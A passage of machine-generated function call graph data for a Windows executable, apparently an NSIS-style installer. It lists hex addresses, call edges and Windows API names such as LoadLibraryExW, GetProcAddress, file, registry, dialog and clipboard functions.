4775 403cd2 FreeLibrary GlobalFree 4773->4775 4774->4593 4775->4774 4775->4775 4785 4015c6 4786 402dab 21 API calls 4785->4786 4787 4015cd 4786->4787 4788 405ffc 4 API calls 4787->4788 4803 4015d6 4788->4803 4789 401636 4791 401668 4789->4791 4792 40163b 4789->4792 4790 405f7e CharNextW 4790->4803 4795 401423 28 API calls 4791->4795 4804 401423 4792->4804 4800 401660 4795->4800 4796 405c30 2 API calls 4796->4803 4798 405c4d 5 API calls 4798->4803 4799 40164f SetCurrentDirectoryW 4799->4800 4801 40161c GetFileAttributesW 4801->4803 4802 405bd6 2 API calls 4802->4803 4803->4789 4803->4790 4803->4796 4803->4798 4803->4801 4803->4802 4805 405707 28 API calls 4804->4805 4806 401431 4805->4806 4807 406682 lstrcpynW 4806->4807 4807->4799 5287 405846 5288 4059f0 5287->5288 5289 405867 GetDlgItem GetDlgItem GetDlgItem 5287->5289 5291 4059f9 GetDlgItem CreateThread CloseHandle 5288->5291 5293 405a21 5288->5293 5332 404636 SendMessageW 5289->5332 5291->5293 5292 4058d7 5298 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 5292->5298 5294 405a4c 5293->5294 5295 405a71 5293->5295 5296 405a38 ShowWindow ShowWindow 5293->5296 5297 405aac 5294->5297 5300 405a60 5294->5300 5301 405a86 ShowWindow 5294->5301 5302 404668 8 API calls 5295->5302 5334 404636 SendMessageW 5296->5334 5297->5295 5305 405aba SendMessageW 5297->5305 5303 405930 SendMessageW SendMessageW 5298->5303 5304 40594c 5298->5304 5335 4045da 5300->5335 5308 405aa6 5301->5308 5309 405a98 5301->5309 5307 405a7f 5302->5307 5303->5304 5312 405951 SendMessageW 5304->5312 5313 40595f 5304->5313 5305->5307 5314 405ad3 CreatePopupMenu 5305->5314 5311 4045da SendMessageW 5308->5311 5310 405707 28 API calls 5309->5310 5310->5308 5311->5297 5312->5313 5316 404601 22 API calls 5313->5316 5315 4066bf 21 API calls 5314->5315 5317 405ae3 AppendMenuW 5315->5317 5318 40596f 5316->5318 5319 405b00 GetWindowRect 5317->5319 5320 405b13 TrackPopupMenu 5317->5320 5321 405978 ShowWindow 5318->5321 5322 4059ac GetDlgItem SendMessageW 5318->5322 5319->5320 5320->5307 5324 405b2e 5320->5324 5325 40599b 5321->5325 5326 40598e ShowWindow 5321->5326 5322->5307 5323 4059d3 SendMessageW SendMessageW 5322->5323 5323->5307 5327 405b4a SendMessageW 5324->5327 5333 404636 SendMessageW 5325->5333 5326->5325 5327->5327 5328 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5327->5328 5330 405b8c SendMessageW 5328->5330 5330->5330 5331 405bb5 GlobalUnlock SetClipboardData CloseClipboard 5330->5331 5331->5307 5332->5292 5333->5322 5334->5294 5336 4045e1 5335->5336 5337 4045e7 SendMessageW 5335->5337 5336->5337 5337->5295 4808 401c48 4809 402d89 21 API calls 4808->4809 4810 401c4f 4809->4810 4811 402d89 21 API calls 4810->4811 4812 401c5c 4811->4812 4813 402dab 21 API calls 4812->4813 4817 401c71 4812->4817 4813->4817 4814 402dab 21 API calls 4818 401c81 4814->4818 4815 401cd8 4820 402dab 21 API calls 4815->4820 4816 401c8c 4819 402d89 21 API calls 4816->4819 4817->4814 4817->4818 4818->4815 4818->4816 4821 401c91 4819->4821 4822 401cdd 4820->4822 4823 402d89 21 API calls 4821->4823 4824 402dab 21 API calls 4822->4824 4825 401c9d 4823->4825 4826 401ce6 FindWindowExW 4824->4826 4827 401cc8 SendMessageW 4825->4827 4828 401caa SendMessageTimeoutW 4825->4828 4829 401d08 4826->4829 4827->4829 4828->4829 5338 404e48 5339 404e74 5338->5339 5340 404e58 5338->5340 5342 404ea7 5339->5342 5343 404e7a SHGetPathFromIDListW 5339->5343 5349 405cc6 GetDlgItemTextW 5340->5349 5345 404e91 SendMessageW 5343->5345 5346 404e8a 5343->5346 5344 404e65 SendMessageW 5344->5339 5345->5342 5348 40140b 2 API calls 5346->5348 5348->5345 5349->5344 5350 4028c9 5351 4028cf 5350->5351 5352 4028d7 FindClose 5351->5352 5353 402c2f 5351->5353 5352->5353 5357 4016d1 5358 402dab 21 API calls 5357->5358 5359 4016d7 GetFullPathNameW 5358->5359 5360 4016f1 5359->5360 5366 401713 5359->5366 5363 4069df 2 API calls 5360->5363 5360->5366 5361 401728 GetShortPathNameW 5362 402c2f 5361->5362 5364 401703 5363->5364 5364->5366 5367 406682 lstrcpynW 5364->5367 5366->5361 5366->5362 5367->5366 5368 401e53 GetDC 5369 402d89 21 API calls 5368->5369 5370 401e65 GetDeviceCaps MulDiv ReleaseDC 5369->5370 5371 402d89 21 API calls 5370->5371 5372 401e96 5371->5372 5373 4066bf 21 API calls 5372->5373 5374 401ed3 CreateFontIndirectW 5373->5374 5375 40263d 5374->5375 5376 402955 5377 402dab 21 API calls 5376->5377 5378 402961 5377->5378 5379 402977 5378->5379 5380 402dab 21 API calls 5378->5380 5381 40614d 2 API calls 5379->5381 5380->5379 5382 40297d 5381->5382 5404 406172 GetFileAttributesW CreateFileW 5382->5404 5384 40298a 5385 402a40 5384->5385 5388 4029a5 GlobalAlloc 5384->5388 5389 402a28 5384->5389 5386 402a47 DeleteFileW 5385->5386 5387 402a5a 5385->5387 5386->5387 5388->5389 5390 4029be 5388->5390 5391 403376 48 API calls 5389->5391 5405 4035fd SetFilePointer 5390->5405 5393 402a35 CloseHandle 5391->5393 5393->5385 5394 4029c4 5395 4035e7 ReadFile 5394->5395 5396 4029cd GlobalAlloc 5395->5396 5397 402a11 5396->5397 5398 4029dd 5396->5398 5400 406224 WriteFile 5397->5400 5399 403376 48 API calls 5398->5399 5403 4029ea 5399->5403 5401 402a1d GlobalFree 5400->5401 5401->5389 5402 402a08 GlobalFree 5402->5397 5403->5402 5404->5384 5405->5394 5420 4014d7 5421 402d89 21 API calls 5420->5421 5422 4014dd Sleep 5421->5422 5424 402c2f 5422->5424 5425 40195b 5426 402dab 21 API calls 5425->5426 5427 401962 lstrlenW 5426->5427 5428 40263d 5427->5428 5003 4020dd 5004 4021a1 5003->5004 5005 4020ef 5003->5005 5008 401423 28 API calls 5004->5008 5006 402dab 21 API calls 5005->5006 5007 4020f6 5006->5007 5009 402dab 21 API calls 5007->5009 5013 4022fb 5008->5013 5010 4020ff 5009->5010 5011 402115 LoadLibraryExW 5010->5011 5012 402107 GetModuleHandleW 5010->5012 5011->5004 5014 402126 5011->5014 5012->5011 5012->5014 5026 406ae5 5014->5026 5017 402170 5019 405707 28 API calls 5017->5019 5018 402137 5020 402156 5018->5020 5021 40213f 5018->5021 5022 402147 5019->5022 5031 6e391817 5020->5031 5023 401423 28 API calls 5021->5023 5022->5013 5024 402193 FreeLibrary 5022->5024 5023->5022 5024->5013 5073 4066a4 WideCharToMultiByte 5026->5073 5028 406b02 5029 406b09 GetProcAddress 5028->5029 5030 402131 5028->5030 5029->5030 5030->5017 5030->5018 5032 6e39184a 5031->5032 5074 6e391bff 5032->5074 5034 6e391851 5035 6e391976 5034->5035 5036 6e391869 5034->5036 5037 6e391862 5034->5037 5035->5022 5108 6e392480 5036->5108 5124 6e39243e 5037->5124 5042 6e3918cd 5046 6e39191e 5042->5046 5047 6e3918d3 5042->5047 5043 6e3918af 5137 6e392655 5043->5137 5044 6e391898 5057 6e39188e 5044->5057 5134 6e392e23 5044->5134 5045 6e39187f 5049 6e391885 5045->5049 5050 6e391890 5045->5050 5054 6e392655 10 API calls 5046->5054 5156 6e391666 5047->5156 5049->5057 5118 6e392b98 5049->5118 5128 6e392810 5050->5128 5064 6e39190f 5054->5064 5055 6e3918b5 5148 6e391654 5055->5148 5057->5042 5057->5043 5061 6e391896 5061->5057 5062 6e392655 10 API calls 5062->5064 5065 6e391965 5064->5065 5162 6e392618 5064->5162 5065->5035 5067 6e39196f GlobalFree 5065->5067 5067->5035 5070 6e391951 5070->5065 5166 6e3915dd wsprintfW 5070->5166 5071 6e39194a FreeLibrary 5071->5070 5073->5028 5169 6e3912bb GlobalAlloc 5074->5169 5076 6e391c26 5170 6e3912bb GlobalAlloc 5076->5170 5078 6e391e6b GlobalFree GlobalFree GlobalFree 5079 6e391e88 5078->5079 5092 6e391ed2 5078->5092 5081 6e39227e 5079->5081 5087 6e391e9d 5079->5087 5079->5092 5080 6e391d26 GlobalAlloc 5098 6e391c31 5080->5098 5082 6e3922a0 GetModuleHandleW 5081->5082 5081->5092 5083 6e3922b1 LoadLibraryW 5082->5083 5084 6e3922c6 5082->5084 5083->5084 5083->5092 5177 6e3916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5084->5177 5085 6e391d71 lstrcpyW 5089 6e391d7b lstrcpyW 5085->5089 5086 6e391d8f GlobalFree 5086->5098 5087->5092 5173 6e3912cc 5087->5173 5089->5098 5090 6e392318 5090->5092 5095 6e392325 lstrlenW 5090->5095 5091 6e392126 5176 6e3912bb GlobalAlloc 5091->5176 5092->5034 5178 6e3916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5095->5178 5096 6e3922d8 5096->5090 5106 6e392302 GetProcAddress 5096->5106 5098->5078 5098->5080 5098->5085 5098->5086 5098->5089 5098->5091 5098->5092 5099 6e392067 GlobalFree 5098->5099 5100 6e3921ae 5098->5100 5101 6e391dcd 5098->5101 5103 6e3912cc 2 API calls 5098->5103 5099->5098 5100->5092 5105 6e392216 lstrcpyW 5100->5105 5101->5098 5171 6e39162f GlobalSize GlobalAlloc 5101->5171 5102 6e39233f 5102->5092 5103->5098 5105->5092 5106->5090 5107 6e39212f 5107->5034 5114 6e392498 5108->5114 5110 6e3925c1 GlobalFree 5113 6e39186f 5110->5113 5110->5114 5111 6e39256b GlobalAlloc CLSIDFromString 5111->5110 5112 6e392540 GlobalAlloc WideCharToMultiByte 5112->5110 5113->5044 5113->5045 5113->5057 5114->5110 5114->5111 5114->5112 5115 6e3912cc GlobalAlloc lstrcpynW 5114->5115 5117 6e39258a 5114->5117 5180 6e39135a 5114->5180 5115->5114 5117->5110 5184 6e3927a4 5117->5184 5120 6e392baa 5118->5120 5119 6e392c4f CloseHandle 5123 6e392c6d 5119->5123 5120->5119 5122 6e392d39 5122->5057 5187 6e392b42 5123->5187 5125 6e392453 5124->5125 5126 6e39245e GlobalAlloc 5125->5126 5127 6e391868 5125->5127 5126->5125 5127->5036 5132 6e392840 5128->5132 5129 6e3928db GlobalAlloc 5133 6e3928fe 5129->5133 5130 6e3928ee 5131 6e3928f4 GlobalSize 5130->5131 5130->5133 5131->5133 5132->5129 5132->5130 5133->5061 5135 6e392e2e 5134->5135 5136 6e392e6e GlobalFree 5135->5136 5191 6e3912bb GlobalAlloc 5137->5191 5139 6e3926d8 MultiByteToWideChar 5147 6e39265f 5139->5147 5140 6e39270b lstrcpynW 5140->5147 5141 6e3926fa StringFromGUID2 5141->5147 5142 6e39271e wsprintfW 5142->5147 5143 6e392742 GlobalFree 5143->5147 5144 6e392777 GlobalFree 5144->5055 5145 6e391312 2 API calls 5145->5147 5147->5139 5147->5140 5147->5141 5147->5142 5147->5143 5147->5144 5147->5145 5192 6e391381 5147->5192 5196 6e3912bb GlobalAlloc 5148->5196 5150 6e391659 5151 6e391666 2 API calls 5150->5151 5152 6e391663 5151->5152 5153 6e391312 5152->5153 5154 6e39131b GlobalAlloc lstrcpynW 5153->5154 5155 6e391355 GlobalFree 5153->5155 5154->5155 5155->5064 5157 6e39169f lstrcpyW 5156->5157 5158 6e391672 wsprintfW 5156->5158 5161 6e3916b8 5157->5161 5158->5161 5161->5062 5163 6e391931 5162->5163 5164 6e392626 5162->5164 5163->5070 5163->5071 5164->5163 5165 6e392642 GlobalFree 5164->5165 5165->5164 5167 6e391312 2 API calls 5166->5167 5168 6e3915fe 5167->5168 5168->5065 5169->5076 5170->5098 5172 6e39164d 5171->5172 5172->5101 5179 6e3912bb GlobalAlloc 5173->5179 5175 6e3912db lstrcpynW 5175->5092 5176->5107 5177->5096 5178->5102 5179->5175 5181 6e391361 5180->5181 5182 6e3912cc 2 API calls 5181->5182 5183 6e39137f 5182->5183 5183->5114 5185 6e392808 5184->5185 5186 6e3927b2 VirtualAlloc 5184->5186 5185->5117 5186->5185 5188 6e392b4d 5187->5188 5189 6e392b5d 5188->5189 5190 6e392b52 GetLastError 5188->5190 5189->5122 5190->5189 5191->5147 5193 6e39138a 5192->5193 5194 6e3913ac 5192->5194 5193->5194 5195 6e391390 lstrcpyW 5193->5195 5194->5147 5195->5194 5196->5150 5436 402b5e 5437 402bb0 5436->5437 5438 402b65 5436->5438 5440 406a76 5 API calls 5437->5440 5439 402bae 5438->5439 5441 402d89 21 API calls 5438->5441 5442 402bb7 5440->5442 5443 402b73 5441->5443 5444 402dab 21 API calls 5442->5444 5446 402d89 21 API calls 5443->5446 5445 402bc0 5444->5445 5445->5439 5447 402bc4 IIDFromString 5445->5447 5449 402b7f 5446->5449 5447->5439 5448 402bd3 5447->5448 5448->5439 5454 406682 lstrcpynW 5448->5454 5453 4065c9 wsprintfW 5449->5453 5452 402bf0 CoTaskMemFree 5452->5439 5453->5439 5454->5452 5455 402a60 5456 402d89 21 API calls 5455->5456 5457 402a66 5456->5457 5458 402aa9 5457->5458 5459 402a8d 5457->5459 5467 402933 5457->5467 5462 402ac3 5458->5462 5463 402ab3 5458->5463 5460 402a92 5459->5460 5461 402aa3 5459->5461 5469 406682 lstrcpynW 5460->5469 5470 4065c9 wsprintfW 5461->5470 5465 4066bf 21 API calls 5462->5465 5464 402d89 21 API calls 5463->5464 5464->5467 5465->5467 5469->5467 5470->5467 4235 401761 4241 402dab 4235->4241 4239 40176f 4240 4061a1 2 API calls 4239->4240 4240->4239 4242 402db7 4241->4242 4251 4066bf 4242->4251 4245 401768 4247 4061a1 4245->4247 4248 4061ae GetTickCount GetTempFileNameW 4247->4248 4249 4061e8 4248->4249 4250 4061e4 4248->4250 4249->4239 4250->4248 4250->4249 4255 4066ca 4251->4255 4252 406911 4253 402dd8 4252->4253 4290 406682 lstrcpynW 4252->4290 4253->4245 4268 406930 4253->4268 4255->4252 4256 4068e2 lstrlenW 4255->4256 4257 4067db GetSystemDirectoryW 4255->4257 4258 4066bf 15 API calls 4255->4258 4262 4067f1 GetWindowsDirectoryW 4255->4262 4263 406883 lstrcatW 4255->4263 4264 406930 5 API calls 4255->4264 4265 4066bf 15 API calls 4255->4265 4267 406853 SHGetPathFromIDListW CoTaskMemFree 4255->4267 4277 406550 4255->4277 4282 406a76 GetModuleHandleA 4255->4282 4288 4065c9 wsprintfW 4255->4288 4289 406682 lstrcpynW 4255->4289 4256->4255 4257->4255 4258->4256 4262->4255 4263->4255 4264->4255 4265->4255 4267->4255 4275 40693d 4268->4275 4269 4069b3 4270 4069b8 CharPrevW 4269->4270 4272 4069d9 4269->4272 4270->4269 4271 4069a6 CharNextW 4271->4269 4271->4275 4272->4245 4274 406992 CharNextW 4274->4275 4275->4269 4275->4271 4275->4274 4276 4069a1 CharNextW 4275->4276 4298 405f7e 4275->4298 4276->4271 4291 4064ef 4277->4291 4280 4065b4 4280->4255 4281 406584 RegQueryValueExW RegCloseKey 4281->4280 4283 406a92 4282->4283 4284 406a9c GetProcAddress 4282->4284 4295 406a06 GetSystemDirectoryW 4283->4295 4286 406aab 4284->4286 4286->4255 4287 406a98 4287->4284 4287->4286 4288->4255 4289->4255 4290->4253 4292 4064fe 4291->4292 4293 406502 4292->4293 4294 406507 RegOpenKeyExW 4292->4294 4293->4280 4293->4281 4294->4293 4296 406a28 wsprintfW LoadLibraryExW 4295->4296 4296->4287 4299 405f84 4298->4299 4300 405f9a 4299->4300 4301 405f8b CharNextW 4299->4301 4300->4275 4301->4299 5471 401d62 5472 402d89 21 API calls 5471->5472 5473 401d73 SetWindowLongW 5472->5473 5474 402c2f 5473->5474 5475 4028e3 5476 4028eb 5475->5476 5477 4028ef FindNextFileW 5476->5477 5479 402901 5476->5479 5478 402948 5477->5478 5477->5479 5481 406682 lstrcpynW 5478->5481 5481->5479 5482 401568 5483 402ba9 5482->5483 5486 4065c9 wsprintfW 5483->5486 5485 402bae 5486->5485 5494 40196d 5495 402d89 21 API calls 5494->5495 5496 401974 5495->5496 5497 402d89 21 API calls 5496->5497 5498 401981 5497->5498 5499 402dab 21 API calls 5498->5499 5500 401998 lstrlenW 5499->5500 5502 4019a9 5500->5502 5501 4019ea 5502->5501 5506 406682 lstrcpynW 5502->5506 5504 4019da 5504->5501 5505 4019df lstrlenW 5504->5505 5505->5501 5506->5504 5507 40506e GetDlgItem GetDlgItem 5508 4050c0 7 API calls 5507->5508 5521 4052e5 5507->5521 5509 405167 DeleteObject 5508->5509 5510 40515a SendMessageW 5508->5510 5511 405170 5509->5511 5510->5509 5512 4051a7 5511->5512 5516 4066bf 21 API calls 5511->5516 5514 404601 22 API calls 5512->5514 5513 4053c7 5515 405473 5513->5515 5518 4052d8 5513->5518 5525 405420 SendMessageW 5513->5525 5517 4051bb 5514->5517 5519 405485 5515->5519 5520 40547d SendMessageW 5515->5520 5522 405189 SendMessageW SendMessageW 5516->5522 5524 404601 22 API calls 5517->5524 5527 404668 8 API calls 5518->5527 5529 405497 ImageList_Destroy 5519->5529 5530 40549e 5519->5530 5537 4054ae 5519->5537 5520->5519 5521->5513 5541 405354 5521->5541 5561 404fbc SendMessageW 5521->5561 5522->5511 5542 4051cc 5524->5542 5525->5518 5532 405435 SendMessageW 5525->5532 5526 4053b9 SendMessageW 5526->5513 5528 405674 5527->5528 5529->5530 5533 4054a7 GlobalFree 5530->5533 5530->5537 5531 405628 5531->5518 5538 40563a ShowWindow GetDlgItem ShowWindow 5531->5538 5535 405448 5532->5535 5533->5537 5534 4052a7 GetWindowLongW SetWindowLongW 5536 4052c0 5534->5536 5546 405459 SendMessageW 5535->5546 5539 4052c5 ShowWindow 5536->5539 5540 4052dd 5536->5540 5537->5531 5553 4054e9 5537->5553 5566 40503c 5537->5566 5538->5518 5559 404636 SendMessageW 5539->5559 5560 404636 SendMessageW 5540->5560 5541->5513 5541->5526 5542->5534 5545 40521f SendMessageW 5542->5545 5547 4052a2 5542->5547 5549 405271 SendMessageW 5542->5549 5550 40525d SendMessageW 5542->5550 5545->5542 5546->5515 5547->5534 5547->5536 5548 40552d 5552 4055f3 5548->5552 5557 4055a1 SendMessageW SendMessageW 5548->5557 5549->5542 5550->5542 5554 4055fe InvalidateRect 5552->5554 5556 40560a 5552->5556 5553->5548 5555 405517 SendMessageW 5553->5555 5554->5556 5555->5548 5556->5531 5575 404f77 5556->5575 5557->5548 5559->5518 5560->5521 5562 40501b SendMessageW 5561->5562 5563 404fdf GetMessagePos ScreenToClient SendMessageW 5561->5563 5564 405013 5562->5564 5563->5564 5565 405018 5563->5565 5564->5541 5565->5562 5578 406682 lstrcpynW 5566->5578 5568 40504f 5579 4065c9 wsprintfW 5568->5579 5570 405059 5571 40140b 2 API calls 5570->5571 5572 405062 5571->5572 5580 406682 lstrcpynW 5572->5580 5574 405069 5574->5553 5581 404eae 5575->5581 5577 404f8c 5577->5531 5578->5568 5579->5570 5580->5574 5582 404ec7 5581->5582 5583 4066bf 21 API calls 5582->5583 5584 404f2b 5583->5584 5585 4066bf 21 API calls 5584->5585 5586 404f36 5585->5586 5587 4066bf 21 API calls 5586->5587 5588 404f4c lstrlenW wsprintfW SetDlgItemTextW 5587->5588 5588->5577 5589 40166f 5590 402dab 21 API calls 5589->5590 5591 401675 5590->5591 5592 4069df 2 API calls 5591->5592 5593 40167b 5592->5593 5594 402af0 5595 402d89 21 API calls 5594->5595 5596 402af6 5595->5596 5597 4066bf 21 API calls 5596->5597 5598 402933 5596->5598 5597->5598 4880 4026f1 4881 402d89 21 API calls 4880->4881 4884 402700 4881->4884 4882 40283d 4883 40274a ReadFile 4883->4882 4883->4884 4884->4882 4884->4883 4885 4027e3 4884->4885 4886 4061f5 ReadFile 4884->4886 4887 40278a MultiByteToWideChar 4884->4887 4888 40283f 4884->4888 4891 4027b0 SetFilePointer MultiByteToWideChar 4884->4891 4892 402850 4884->4892 4885->4882 4885->4884 4894 406253 SetFilePointer 4885->4894 4886->4884 4887->4884 4903 4065c9 wsprintfW 4888->4903 4891->4884 4892->4882 4893 402871 SetFilePointer 4892->4893 4893->4882 4895 40626f 4894->4895 4897 406287 4894->4897 4896 4061f5 ReadFile 4895->4896 4898 40627b 4896->4898 4897->4885 4898->4897 4899 406290 SetFilePointer 4898->4899 4900 4062b8 SetFilePointer 4898->4900 4899->4900 4901 40629b 4899->4901 4900->4897 4902 406224 WriteFile 4901->4902 4902->4897 4903->4882 5599 404771 lstrlenW 5600 404790 5599->5600 5601 404792 WideCharToMultiByte 5599->5601 5600->5601 5602 404af2 5603 404b1e 5602->5603 5604 404b2f 5602->5604 5663 405cc6 GetDlgItemTextW 5603->5663 5606 404b3b GetDlgItem 5604->5606 5612 404b9a 5604->5612 5608 404b4f 5606->5608 5607 404b29 5610 406930 5 API calls 5607->5610 5611 404b63 SetWindowTextW 5608->5611 5616 405ffc 4 API calls 5608->5616 5609 404c7e 5613 404e2d 5609->5613 5665 405cc6 GetDlgItemTextW 5609->5665 5610->5604 5617 404601 22 API calls 5611->5617 5612->5609 5612->5613 5618 4066bf 21 API calls 5612->5618 5615 404668 8 API calls 5613->5615 5620 404e41 5615->5620 5621 404b59 5616->5621 5622 404b7f 5617->5622 5623 404c0e SHBrowseForFolderW 5618->5623 5619 404cae 5624 406059 18 API calls 5619->5624 5621->5611 5630 405f51 3 API calls 5621->5630 5625 404601 22 API calls 5622->5625 5623->5609 5626 404c26 CoTaskMemFree 5623->5626 5627 404cb4 5624->5627 5628 404b8d 5625->5628 5629 405f51 3 API calls 5626->5629 5666 406682 lstrcpynW 5627->5666 5664 404636 SendMessageW 5628->5664 5632 404c33 5629->5632 5630->5611 5635 404c6a SetDlgItemTextW 5632->5635 5639 4066bf 21 API calls 5632->5639 5634 404b93 5637 406a76 5 API calls 5634->5637 5635->5609 5636 404ccb 5638 406a76 5 API calls 5636->5638 5637->5612 5646 404cd2 5638->5646 5640 404c52 lstrcmpiW 5639->5640 5640->5635 5643 404c63 lstrcatW 5640->5643 5641 404d13 5667 406682 lstrcpynW 5641->5667 5643->5635 5644 404d1a 5645 405ffc 4 API calls 5644->5645 5647 404d20 GetDiskFreeSpaceW 5645->5647 5646->5641 5650 405f9d 2 API calls 5646->5650 5652 404d6b 5646->5652 5649 404d44 MulDiv 5647->5649 5647->5652 5649->5652 5650->5646 5651 404ddc 5654 404dff 5651->5654 5656 40140b 2 API calls 5651->5656 5652->5651 5653 404f77 24 API calls 5652->5653 5655 404dc9 5653->5655 5668 404623 EnableWindow 5654->5668 5657 404dde SetDlgItemTextW 5655->5657 5658 404dce 5655->5658 5656->5654 5657->5651 5661 404eae 24 API calls 5658->5661 5660 404e1b 5660->5613 5662 404a4b SendMessageW 5660->5662 5661->5651 5662->5613 5663->5607 5664->5634 5665->5619 5666->5636 5667->5644 5668->5660 4904 401774 4905 402dab 21 API calls 4904->4905 4906 40177b 4905->4906 4907 4017a3 4906->4907 4908 40179b 4906->4908 4945 406682 lstrcpynW 4907->4945 4944 406682 lstrcpynW 4908->4944 4911 4017a1 4915 406930 5 API calls 4911->4915 4912 4017ae 4913 405f51 3 API calls 4912->4913 4914 4017b4 lstrcatW 4913->4914 4914->4911 4922 4017c0 4915->4922 4916 4069df 2 API calls 4916->4922 4917 4017fc 4918 40614d 2 API calls 4917->4918 4918->4922 4920 4017d2 CompareFileTime 4920->4922 4921 401892 4923 405707 28 API calls 4921->4923 4922->4916 4922->4917 4922->4920 4922->4921 4925 406682 lstrcpynW 4922->4925 4931 4066bf 21 API calls 4922->4931 4939 405ce2 MessageBoxIndirectW 4922->4939 4942 401869 4922->4942 4943 406172 GetFileAttributesW CreateFileW 4922->4943 4926 40189c 4923->4926 4924 405707 28 API calls 4930 40187e 4924->4930 4925->4922 4927 403376 48 API calls 4926->4927 4929 4018af 4927->4929 4928 4018c3 SetFileTime 4932 4018d5 CloseHandle 4928->4932 4929->4928 4929->4932 4931->4922 4932->4930 4933 4018e6 4932->4933 4934 4018eb 4933->4934 4935 4018fe 4933->4935 4937 4066bf 21 API calls 4934->4937 4936 4066bf 21 API calls 4935->4936 4938 401906 4936->4938 4940 4018f3 lstrcatW 4937->4940 4938->4930 4941 405ce2 MessageBoxIndirectW 4938->4941 4939->4922 4940->4938 4941->4930 4942->4924 4942->4930 4943->4922 4944->4911 4945->4912 5669 6e39170d 5670 6e3915b6 GlobalFree 5669->5670 5672 6e391725 5670->5672 5671 6e39176b GlobalFree 5672->5671 5673 6e391740 5672->5673 5674 6e391757 VirtualFree 5672->5674 5673->5671 5674->5671 5675 4014f5 SetForegroundWindow 5676 402c2f 5675->5676 5677 401a77 5678 402d89 21 API calls 5677->5678 5679 401a80 5678->5679 5680 402d89 21 API calls 5679->5680 5681 401a25 5680->5681 5682 401578 5683 401591 5682->5683 5684 401588 ShowWindow 5682->5684 5685 402c2f 5683->5685 5686 40159f ShowWindow 5683->5686 5684->5683 5686->5685 4996 4023f9 4997 402dab 21 API calls 4996->4997 4998 402408 4997->4998 4999 402dab 21 API calls 4998->4999 5000 402411 4999->5000 5001 402dab 21 API calls 5000->5001 5002 40241b GetPrivateProfileStringW 5001->5002 5687 6e391000 5688 6e39101b 5 API calls 5687->5688 5689 6e391019 5688->5689 5690 40567b 5691 40568b 5690->5691 5692 40569f 5690->5692 5693 405691 5691->5693 5702 4056e8 5691->5702 5694 4056a7 IsWindowVisible 5692->5694 5698 4056be 5692->5698 5696 40464d SendMessageW 5693->5696 5697 4056b4 5694->5697 5694->5702 5695 4056ed CallWindowProcW 5699 40569b 5695->5699 5696->5699 5700 404fbc 5 API calls 5697->5700 5698->5695 5701 40503c 4 API calls 5698->5701 5700->5698 5701->5702 5702->5695 5703 401ffb 5704 402dab 21 API calls 5703->5704 5705 402002 5704->5705 5706 4069df 2 API calls 5705->5706 5707 402008 5706->5707 5709 402019 5707->5709 5710 4065c9 wsprintfW 5707->5710 5710->5709 5711 401b7c 5712 402dab 21 API calls 5711->5712 5713 401b83 5712->5713 5714 402d89 21 API calls 5713->5714 5715 401b8c wsprintfW 5714->5715 5716 402c2f 5715->5716 5717 401000 5718 401037 BeginPaint GetClientRect 5717->5718 5719 40100c DefWindowProcW 5717->5719 5721 4010f3 5718->5721 5724 401179 5719->5724 5722 401073 CreateBrushIndirect FillRect DeleteObject 5721->5722 5723 4010fc 5721->5723 5722->5721 5725 401102 CreateFontIndirectW 5723->5725 5726 401167 EndPaint 5723->5726 5725->5726 5727 401112 6 API calls 5725->5727 5726->5724 5727->5726 5728 6e391979 5729 6e39199c 5728->5729 5730 6e3919d1 GlobalFree 5729->5730 5731 6e3919e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5729->5731 5730->5731 5732 6e391312 2 API calls 5731->5732 5733 6e391b6e GlobalFree GlobalFree 5732->5733 5734 401680 5735 402dab 21 API calls 5734->5735 5736 401687 5735->5736 5737 402dab 21 API calls 5736->5737 5738 401690 5737->5738 5739 402dab 21 API calls 5738->5739 5740 401699 MoveFileW 5739->5740 5741 4016ac 5740->5741 5747 4016a5 5740->5747 5742 4069df 2 API calls 5741->5742 5745 4022fb 5741->5745 5744 4016bb 5742->5744 5743 401423 28 API calls 5743->5745 5744->5745 5746 406442 40 API calls 5744->5746 5746->5747 5747->5743 5748 404102 5749 40411a 5748->5749 5750 40427b 5748->5750 5749->5750 5751 404126 5749->5751 5752 4042cc 5750->5752 5753 40428c GetDlgItem GetDlgItem 5750->5753 5755 404131 SetWindowPos 5751->5755 5756 404144 5751->5756 5754 404326 5752->5754 5762 401389 2 API calls 5752->5762 5757 404601 22 API calls 5753->5757 5758 40464d SendMessageW 5754->5758 5763 404276 5754->5763 5755->5756 5759 40414d ShowWindow 5756->5759 5760 40418f 5756->5760 5761 4042b6 SetClassLongW 5757->5761 5788 404338 5758->5788 5764 404239 5759->5764 5765 40416d GetWindowLongW 5759->5765 5766 404197 DestroyWindow 5760->5766 5767 4041ae 5760->5767 5768 40140b 2 API calls 5761->5768 5772 4042fe 5762->5772 5773 404668 8 API calls 5764->5773 5765->5764 5774 404186 ShowWindow 5765->5774 5769 40458a 5766->5769 5770 4041b3 SetWindowLongW 5767->5770 5771 4041c4 5767->5771 5768->5752 5769->5763 5781 4045bb ShowWindow 5769->5781 5770->5763 5771->5764 5775 4041d0 GetDlgItem 5771->5775 5772->5754 5776 404302 SendMessageW 5772->5776 5773->5763 5774->5760 5779 4041e1 SendMessageW IsWindowEnabled 5775->5779 5780 4041fe 5775->5780 5776->5763 5777 40140b 2 API calls 5777->5788 5778 40458c DestroyWindow EndDialog 5778->5769 5779->5763 5779->5780 5783 40420b 5780->5783 5786 404252 SendMessageW 5780->5786 5787 40421e 5780->5787 5793 404203 5780->5793 5781->5763 5782 4066bf 21 API calls 5782->5788 5783->5786 5783->5793 5784 4045da SendMessageW 5784->5764 5785 404601 22 API calls 5785->5788 5786->5764 5789 404226 5787->5789 5790 40423b 5787->5790 5788->5763 5788->5777 5788->5778 5788->5782 5788->5785 5794 404601 22 API calls 5788->5794 5810 4044cc DestroyWindow 5788->5810 5792 40140b 2 API calls 5789->5792 5791 40140b 2 API calls 5790->5791 5791->5793 5792->5793 5793->5764 5793->5784 5795 4043b3 GetDlgItem 5794->5795 5796 4043d0 ShowWindow EnableWindow 5795->5796 5797 4043c8 5795->5797 5819 404623 EnableWindow 5796->5819 5797->5796 5799 4043fa EnableWindow 5804 40440e 5799->5804 5800 404413 GetSystemMenu EnableMenuItem SendMessageW 5801 404443 SendMessageW 5800->5801 5800->5804 5801->5804 5803 4040e3 22 API calls 5803->5804 